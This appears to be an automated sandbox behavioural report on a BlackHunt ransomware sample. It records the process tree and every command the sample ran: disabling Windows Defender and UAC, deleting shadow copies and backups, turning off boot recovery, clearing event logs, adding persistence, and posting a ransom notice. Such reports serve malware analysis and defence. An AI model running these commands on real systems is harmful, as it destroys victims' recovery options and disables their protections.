2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe 160 PID 4604 wrote to memory of 4028 4604 cmd.exe 157 PID 4604 wrote to memory of 4028 4604 cmd.exe 157 PID 1012 wrote to memory of 3356 1012 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe 156 PID 1012 wrote to memory of 3356 1012 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe 156 PID 1012 wrote to memory of 2740 1012 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe 55 PID 1012 wrote to memory of 2740 1012 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe 55 PID 1508 wrote to memory of 1572 1508 cmd.exe 53 PID 1508 wrote to memory of 1572 1508 cmd.exe 53 PID 3612 wrote to memory of 4116 3612 cmd.exe 52 PID 3612 wrote to memory of 4116 3612 cmd.exe 52 PID 4912 wrote to memory of 2932 4912 cmd.exe 155 PID 4912 wrote to memory of 2932 4912 cmd.exe 155 PID 1012 wrote to memory of 5036 1012 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe 154 PID 1012 wrote to memory of 5036 1012 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe 154 PID 4936 wrote to memory of 1496 4936 cmd.exe 57 PID 4936 wrote to memory of 1496 4936 cmd.exe 57 PID 1012 wrote to memory of 3324 1012 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe 151 PID 1012 wrote to memory of 3324 1012 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe 151 PID 2548 wrote to memory of 2664 2548 cmd.exe 152 PID 2548 wrote to memory of 2664 2548 cmd.exe 152 PID 1012 wrote to memory of 3640 1012 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe 150 PID 1012 wrote to memory of 3640 1012 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe 150 PID 1012 wrote to memory of 1096 1012 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe 147 PID 1012 wrote to memory of 1096 1012 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe 147 PID 468 wrote to memory of 1048 468 cmd.exe 58 PID 468 wrote to memory of 1048 468 cmd.exe 58 PID 1400 wrote to memory of 3592 1400 cmd.exe 148 PID 1400 wrote to memory of 3592 1400 cmd.exe 148 PID 2324 wrote to memory of 4988 2324 cmd.exe 60 PID 2324 wrote to memory of 4988 2324 cmd.exe 60 PID 3356 wrote to memory of 2332 3356 cmd.exe 61 PID 3356 wrote to memory of 2332 3356 cmd.exe 61 PID 1012 wrote to memory of 2132 1012 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe 145 PID 1012 wrote to memory of 2132 1012 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe 145 PID 2740 wrote to memory of 5016 2740 cmd.exe 78 PID 2740 wrote to memory of 5016 2740 cmd.exe 78 PID 3640 wrote to memory of 3560 3640 cmd.exe 64 PID 3640 wrote to memory of 3560 3640 cmd.exe 64 PID 1096 wrote to memory of 2796 1096 cmd.exe 63 PID 1096 wrote to memory of 2796 1096 cmd.exe 63 PID 5036 wrote to memory of 2908 5036 cmd.exe 233 PID 5036 wrote to memory of 2908 5036 cmd.exe 233 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe"C:\Users\Admin\AppData\Local\Temp\2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1012 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4604 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:4028
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4632 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:3336
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3612 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:4116
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4912 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:2932
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1400 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:3592
-
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:640
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2548 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:2664
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2740 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:5016
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:3588
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:3852
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2680
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:752
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:2484
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:4600
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe" /F2⤵PID:1392
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe" /F3⤵
- Creates scheduled task(s)
PID:3928
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:412
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4588
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:1032
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:640
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1696
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:3292
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:4528
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:9380
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:2312
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:9876
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:2404
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:10124
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:4336
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:10132
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:3736
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:9868
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:404
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:3756
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:5072
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:2744
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:740
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:4672
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:1656
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:1004
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:4552
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:4756
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2496
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:2132
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1096
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3640
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:3324
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:5036
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3356
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:468
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4936
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2324
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1508
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:3068
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
PID:12496
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:2908
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
PID:284
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:6640
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:9568
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:9556
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:10752
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:6844
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:14728
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:4032
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:14832
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:11092
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:11684
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:7684
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:15440
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:10060
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:16340
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:14608
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:8328
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\2ba1f078b4f8a609f3b7aaf8852f3c6eb44ac0bb4c9368ec14c026259c9ede87.exe"2⤵PID:12792
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:13988
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵PID:7024
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:14628
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:13108
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:12864
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:11128
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:6512
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:4984
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:6488
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:532
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:12932
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:12904
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:13116
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f1⤵
- Modifies registry class
PID:1572
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f1⤵PID:1496
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f1⤵PID:1048
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f1⤵
- Modifies Windows Defender Real-time Protection settings
PID:4988
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f1⤵PID:2332
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f1⤵PID:2796
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f1⤵PID:3560
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f1⤵PID:1100
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f1⤵PID:3744
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:5016
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded1⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2380
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:8436
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Interacts with shadow copies
PID:3848
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded1⤵
- Interacts with shadow copies
PID:3288
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB1⤵
- Interacts with shadow copies
PID:5884
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f1⤵PID:2940
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f1⤵PID:3268
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5520
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f1⤵PID:4016
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f1⤵PID:3848
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:13144
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f1⤵PID:532
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3392
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f1⤵PID:4576
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f1⤵PID:3372
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:14512
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f1⤵PID:2908
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:2312
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\1⤵
- Enumerates connected drives
PID:1420
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application1⤵
- Clears Windows event logs
PID:5192
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Interacts with shadow copies
PID:10280
-
